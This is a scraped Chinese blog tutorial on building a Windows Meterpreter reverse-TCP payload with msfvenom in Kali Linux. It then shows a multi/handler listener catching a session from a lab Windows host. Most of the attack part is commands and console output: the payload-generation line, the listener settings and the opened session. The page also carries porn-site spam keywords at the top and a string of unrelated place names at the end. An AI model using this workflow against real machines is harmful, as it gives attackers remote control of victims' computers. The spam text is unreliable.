91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Kali下Metasploit的shellcode在windows中的使用

發布時間:2020-06-30 10:48:23 來源:網絡 閱讀:3131 作者:Chen__k 欄目:安全技術

網絡拓撲:
Kali下Metasploit的shellcode在windows中的使用
kaili系統版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的時候用的是msfpayload命令

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211 

3.將生成的sehllcode上傳至windows主機中并運行:
Kali下Metasploit的shellcode在windows中的使用

4.已經有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

绵竹市| 延津县| 阳城县| 收藏| 商水县| 阜南县| 长治县| 深泽县| 惠水县| 云霄县| 同心县| 中牟县| 同德县| 和龙市| 拉萨市| 辽源市| 梁山县| 沾化县| 华坪县| 彩票| 吉林省| 新蔡县| 宁陵县| 遂溪县| 金沙县| 九龙县| 佛学| 石嘴山市| 左贡县| 钦州市| 娄烦县| 平罗县| 华坪县| 安溪县| 盐山县| 宝鸡市| 安仁县| 太保市| 安远县| 洛南县| 铁力市|